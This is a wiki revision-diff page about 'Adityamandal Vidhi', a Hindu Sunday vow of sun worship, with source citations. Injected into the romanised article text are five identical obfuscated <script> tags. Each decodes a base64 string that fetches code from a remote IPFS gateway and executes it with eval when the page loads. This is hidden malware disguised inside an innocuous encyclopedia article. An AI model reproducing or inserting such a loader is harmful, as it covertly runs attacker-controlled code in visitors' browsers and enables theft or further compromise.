Difference between revisions of "आदित्यमण्डल विधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==संबंधित लिंक==" to "==सम्बंधित लिंक==")
m (Text replace - ")</ref" to "</ref")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*आदित्यमण्डल विधि वारव्रत है।
 
*आदित्यमण्डल विधि वारव्रत है।
 
*आदित्यमण्डल विधि में [[सूर्य देवता]] की पूजा की जाती है।
 
*आदित्यमण्डल विधि में [[सूर्य देवता]] की पूजा की जाती है।
*आदित्यमण्डल विधि व्रत एक वर्ष के लिए किया जाता है। <ref>[[मत्स्य पुराण]] 97|2-19; कृत्यकल्पतरु  (व्रत खण्ड 31-34), हेमाद्रि (व्रत खण्ड 2, 538-41); कृत्यरत्नाकर (608-610)</ref>
+
*आदित्यमण्डल विधि व्रत एक वर्ष के लिए किया जाता है।<ref>[[मत्स्य पुराण]] 97|2-19; कृत्यकल्पतरु  (व्रत खण्ड 31-34), हेमाद्रि (व्रत खण्ड 2, 538-41); कृत्यरत्नाकर (608-610</ref>
 
*ऐसी मान्यता है कि हस्त [[नक्षत्र]] में [[रविवार]] या आगे आने वाले रविवार को नक्त (केवल रात्रि में भोजन) करना चाहिये।
 
*ऐसी मान्यता है कि हस्त [[नक्षत्र]] में [[रविवार]] या आगे आने वाले रविवार को नक्त (केवल रात्रि में भोजन) करना चाहिये।
*लाल [[चन्दन]] या [[कुमकुम]] से रचित वृत्त में श्वेत [[गेंहूँ]] या [[जौ]]] के आटे में [[गाय]] के घृत एवं [[गुड़]] को मिलाकर उसकी टिकिया और उस पर लाल [[पुष्प|पुष्पों]] को रखकर पूजा करनी चाहिये। (<ref>हेमाद्रि व्रत खण्ड 1, 753-754, भविष्योत्तरपुराण 44|1-9 से उद्धरण); अहल्याकामधेनु।</ref>  
+
*लाल [[चन्दन]] या [[कुमकुम]] से रचित वृत्त में श्वेत [[गेंहूँ]] या [[जौ]] के आटे में [[गाय]] के घृत एवं [[गुड़]] को मिलाकर उसकी टिकिया और उस पर लाल [[पुष्प|पुष्पों]] को रखकर पूजा करनी चाहिये।<ref>हेमाद्रि व्रत खण्ड 1, 753-754, भविष्योत्तरपुराण 44|1-9 से उद्धरण; अहल्याकामधेनु।</ref>  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 12: Line 13:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==सम्बंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:40, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • adityamandal vidhi varavrat hai.
  • adityamandal vidhi mean soory devata ki pooja ki jati hai.
  • adityamandal vidhi vrat ek varsh ke lie kiya jata hai.[1]
  • aisi manyata hai ki hast nakshatr mean ravivar ya age ane vale ravivar ko nakt (keval ratri mean bhojan) karana chahiye.
  • lal chandan ya kumakum se rachit vritt mean shvet geanhooan ya jau ke ate mean gay ke ghrit evan gu d ko milakar usaki tikiya aur us par lal pushpoan ko rakhakar pooja karani chahiye.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. matsy puran 97|2-19; krityakalpataru (vrat khand 31-34), hemadri (vrat khand 2, 538-41); krityaratnakar (608-610
  2. hemadri vrat khand 1, 753-754, bhavishyottarapuran 44|1-9 se uddharan; ahalyakamadhenu.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>